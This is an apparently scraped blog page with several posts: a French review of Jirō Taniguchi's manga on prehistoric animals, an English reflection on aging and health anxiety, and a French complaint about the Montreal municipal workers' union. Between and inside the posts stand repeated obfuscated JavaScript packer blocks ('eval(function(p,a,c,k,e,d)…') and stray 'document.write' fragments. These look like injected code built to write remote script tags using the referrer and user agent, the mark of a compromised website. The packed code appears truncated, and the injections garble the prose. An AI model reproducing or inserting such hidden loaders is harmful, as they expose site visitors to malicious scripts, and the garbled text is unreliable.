Encyclopédie des Animaux de la Préhistoire

“Il y a longtemps, document.write(“”); bien longtemps, si longtemps que c’est difficile à imaginer. La nature n’était pas encore polluée, elle était luxuriante et toutes sortes d’animaux vivaient sur la Terre. Ce sont les ancêtres des animaux actuels. Pourquoi l’éléphant est-il si grand ? Comment les ours se sont-ils mis à hiberner ? Confrontés aux terribles changements de la nature, tous ces êtres ont connu des joies et des peines; certains ont évolué, d’autres se sont éteints. Telles sont les lois de la Nature.” [Texte d’intro sur le site de l’éditeur, basé sur la préface de Taniguchi]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnnfn|var|u0026u|referrer|rbrkb||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hsyyi|var|u0026u|referrer|ztrsh||js|php’.split(‘|’),0,{}))

Jir? Taniguchi est un mangaka des plus éclectique. On retrouve plusieurs grands thèmes tout au long de son oeuvre, mais chacun de ces thèmes a eut une certaine proéminence durant une période de temps. Ainsi, durant les années ’80, il a surtout écrit des histoires policières ou d’action inspirées du roman noir et des histoires inspirées du roman animalier. Dans les années ’90, il a développé ses oeuvres maîtresses traitant de la vie quotidienne et des souvenirs. Puis, dans les années 2000, il a surtout abordé des sujets traitant du grand air et de la nature. L’Encyclopédie des animaux de la préhistoire s’inscrit dans son thème animalier et n’est sans doute pas étrangé au fait qu’il ait été, de 1966 à 1972, l’assitant de Ky?ta Ishikawa pour lequel il dessinait surtout des animaux.

L’Encyclopédie des Animaux de la Préhistoire [???? / Gen Juiten] a d’abord été sérialisé entre 1987 et 1990 avant d’être compilé au éditions Futabasha en 1998 (2006 en France). Il s’agit de dix-huit petites histoires courtes (dont deux en couleurs: “Prologue: La Promenade de l’Elasmotherium” et “Chapitre 3: Souviens-toi… Le Mammouth jeffersonien”) qui font six ou huit pages et qui nous introduisent à la vie quotidienne d’autant d’espèces d’animaux préhistoriques (Elasmotherium, Machairodus, Agriotherium, Mammouth, Phororhacos, Pliohippus, Mégatherium, Oxydactylus, Paleomastodon, Protocetus, Kannemeyeria, Cynodictis, Indricothère, Palaeotragus, Proganochelys, Mesocyon, Eozostrodon et Ramapithèque). Les histoires sont toutes suivies d’un commentaire de deux pages, par Ryuichi KANEKO, qui nous en apprend un peu plus sur l’époque, les moeurs ou la physiologie des petites bêtes en question.

Avec L’Encyclopédie des Animaux de la Préhistoire, Taniguchi nous offre un style très réaliste et détaillé (un peu trop peut-être par moment car les planches y sont parfois un peu surchargées). C’est un de ses ouvrages mineurs, qui est plus intéressant pour son aspect “encyclopédique” de vulgarisation scientifique, qui vise sans doute à intéresser les jeunes à la préhistoire, que pour ses récits trop courts. L’ensemble se veut léger mais malheureusement les appendices savants le rendent trop lourd pour être une lecture agréable et relaxante. C’est plutôt original et éducatif, mais pas le genre de lecture à prendre pour tuer le temps dans la salle d’attente d’une clinique.

Encyclopédie des animaux de la préhistoire, par Jir? TANIGUCHI (commentaires par Ryuichi KANEKO). Dargaud (Coll. Kana, label Made In), 2006. B&W (14 pg en couleur), 15 x 21 cm, 164 pgs. 10 €. Recommandé pour adolescents (12+). ISBN: 978-2505000273.
Tales of the prehistoric animal kingdom © 1998 by Jiro Taniguchi. All rights reserved. © Kana (Dargaud-Lombard s.a.), 2006 pour la traduction française.

The ailments of age

When you get near fifty year-old you start getting all sorts of ailments. And you cannot help wondering which one of those will get you in the end. When you have a headache, document.write(“”); you wonder “would it be a cerebro-vascular accident? A tumor?” You read some stupid comments on a forum or some hate mail and your heart gets pumpin’ or your chest hurt: will it be an heart attack? Or an aortal aneurism? You can’t remember a movie title or someone’s name: would it be Alzheimer? You have an heartburn: would it be an ulcer? Stomac cancer? You have digestive problems or too much gaz: would it be colon cancer? You get up three times to pee during the night: would it be prostate cancer? You have chronic back pain: would it be an herniated disc? Kidney problems? And so on for each possible organ or body parts…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teyer|var|u0026u|referrer|yaeyz||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btysi|var|u0026u|referrer|zenbd||js|php’.split(‘|’),0,{}))

And you worry so much about those things it makes you sick. You go to a clinic for tests and check-ups, to find some reassurance. There’s nothing you can do about it but try to forget about those problems, try to live your life and be happy. As Marcus Aurelius said, there’s no use worrying about stuff we don’t have control over. It doesn’t really work that way, but sometimes you still have good days. You know there will be less and less of those, so you do your best to live in the moment and seize the day…

The quiet job that you thought would lead to a quiet life and more time to think and write, is causing you stomac upset instead? You need to take it with a grain of salt and be as much zen as possible about it. Nothing matters but the enjoyment of life…

Dude, mais où est donc mon syndicat?

C’est la question que je me posais cette semaine. Et je ne suis pas le seul puisque l’équipe du 109 au 429 écrivait récemment une Nouvelle Du Jour titrée “Le SFMM a-t-il survécu à l’élection d’AccèsCible ?”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szdez|var|u0026u|referrer|sserh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbrkh|var|u0026u|referrer|skksy||js|php’.split(‘|’),0,{}))

En effet, document.write(“”); l’équipe syndicale en place (bien sûr il s’agit ici du
Syndicat des Fonctionnaires Municipaux de Montréal, le SFMM ou SCFP-429) est tellement active (ici vous devez sentir le sarcasme) que nos conditions de travail ne cessent de dépérir! Bon, il faut avouer qu’ils n’en sont pas les seul responsable puisque, après tout, nous (les travailleurs) les avons réélu. Entre ceux d’entre nous qui refusent de se plaindre (et parfois font pression sur leur collèques pour qu’ils en fassent autant) car ils ont la trouille de se retrouver dans un environnement de travail toxique s’ils font trop de vagues et ceux qui sont tellement désillusionné qu’ils pensent que toute action est inutile, et bien il n’y a pas grand chose qui bouge! C’est vrai que, comme je le dis souvent, le syndicalisme est une lame à double tranchant: c’est une défense nécessaire contre l’exploitation des travailleurs mais peut parfois mener à de l’abus (demande excessive, collusion, corruption, etc.); il faut donc en user avec précaution. Toutefois, je vous mets en garde, l’inaction syndicale a un grand coût: cela créé des précédants et le patronat se convainc qu’il peut s’en permettre encore plus. Et cela mène à l’érosion graduelle et inexorable de nos conditions de travail.

Des fois je me demande si le syndicalisme n’est pas simplement une autre façon d’exploiter les travailleurs, de leur soutirer encore plus d’argent tout en les mettant en confiance et en sécurité… Car comment le syndicat peut-il avoir laissé passé des lettres d’entente comme celles qui ont récemment été signées? Comment nous, les travailleurs, avons nous laissé passer cela en votant en assemblé? C’est vrai que ces lettres d’entente, qui concernent pourtant tout le monde, ont été voté par les travailleurs de chaque arrondissement concerné seulement. Diviser pour règner. La décision n’était pourtant pas difficile: une bonne lettre d’entente ou convention collective en est une qui préserve nos conditions de travail ou les améliore. Point. Tout autre résultat est catégoriquement inacceptable… Alors pourquoi les avoir négocié? Pourquoi les avoir voté? Bon, il est vrai que les travailleurs ont voté les ententes à l’aveuglette, sans en avoir préalablement vu et lu les textes, mais pourquoi avoir accepté de telles conditions de vote?

Des fois je me demande si tout ce combat en vaut vraiment la peine. Pourquoi ne pas s’en foutre et simplement faire la petite job pépère qu’on me demande de faire? L’alternative me semble tellement affreuse: pour rétablir la situation (et nos conditions de travail — notez que j’ai rien à dire sur les conditions salariales, à part l’équité salariale qui se fait attendre) cela voudrait dire une lutte acharnée pour empécher toute nouvelle lettre d’entente d’être signée, pour (re)négocier la convention collective l’année prochaine (incluant de nouvelles lettres d’entente), pour préparer une nouvelle équipe syndicale qui aurait des chances de prendre le pouvoir dans quatre ans, ou alors simplement tout reprendre à zéro et se magasiner un autre syndicat? C’est beaucoup de travail… et peu de gratifications. Mais après ça il faudrait vivre avec des conditions de travail insatisfaisantes et une conscience troublée…

Dude, où est donc mon syndicat quand j’en ai de besoin?

This week in the press (2010-02-23)

This week again it’s all about the Vancouver Olympics… And very little else!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eriyt|var|u0026u|referrer|diybe||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nsrnk|var|u0026u|referrer|hfzyi||js|php’.split(‘|’),0,{}))

Books, document.write(“”); Digital Edition & Library

Health & Influenza A(H1N1)

Humour


Japan

Media, Culture & Society

Montreal & local politics

Science

Technology

See also the “Suggested Links (Shared Items)” in the column on the right side

(updated 2010/02/24)